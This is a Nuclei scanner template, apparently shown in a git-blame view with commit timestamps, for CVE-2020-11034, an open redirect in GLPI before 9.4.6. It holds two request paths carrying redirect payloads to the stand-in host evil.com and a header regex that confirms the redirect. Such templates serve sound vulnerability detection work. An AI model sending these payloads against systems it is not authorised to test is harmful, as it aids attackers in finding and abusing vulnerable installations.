2021-01-02 04:56:15 +00:00
|
|
|
id: CVE-2020-11034
|
2020-09-04 07:16:47 +00:00
|
|
|
|
|
|
|
info:
|
2022-05-09 16:12:52 +00:00
|
|
|
name: GLPI <9.4.6 - Open Redirect
|
2020-09-04 07:16:47 +00:00
|
|
|
author: pikpikcu
|
2021-09-10 11:26:40 +00:00
|
|
|
severity: medium
|
2022-05-09 16:12:52 +00:00
|
|
|
description: GLPI prior 9.4.6 contains an open redirect vulnerability based on a regexp.
|
|
|
|
remediation: Upgrade to version 9.4.6 or later.
|
2021-08-18 11:37:49 +00:00
|
|
|
reference:
|
2021-08-19 14:44:46 +00:00
|
|
|
- https://github.com/glpi-project/glpi/security/advisories/GHSA-gxv6-xq9q-37hg
|
|
|
|
- https://github.com/glpi-project/glpi/archive/9.4.6.zip
|
|
|
|
- https://nvd.nist.gov/vuln/detail/CVE-2020-11034
|
2021-09-10 11:26:40 +00:00
|
|
|
classification:
|
|
|
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
|
2022-04-22 10:38:41 +00:00
|
|
|
cvss-score: 6.1
|
2021-09-10 11:26:40 +00:00
|
|
|
cve-id: CVE-2020-11034
|
|
|
|
cwe-id: CWE-601
|
2022-04-22 10:38:41 +00:00
|
|
|
tags: cve,cve2020,redirect,glpi
|
2020-09-04 07:16:47 +00:00
|
|
|
|
|
|
|
requests:
|
|
|
|
- method: GET
|
|
|
|
|
|
|
|
path:
|
2020-09-04 18:02:18 +00:00
|
|
|
- '{{BaseURL}}/index.php?redirect=/\/evil.com/'
|
|
|
|
- '{{BaseURL}}/index.php?redirect=//evil.com'
|
2020-09-04 07:16:47 +00:00
|
|
|
|
|
|
|
matchers:
|
|
|
|
- type: regex
|
|
|
|
regex:
|
|
|
|
- '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_]*\.)?evil\.com(?:\s*?)$'
|
|
|
|
part: header
|
2022-05-09 16:12:52 +00:00
|
|
|
|
|
|
|
# Enhanced by mp on 2022/05/04
|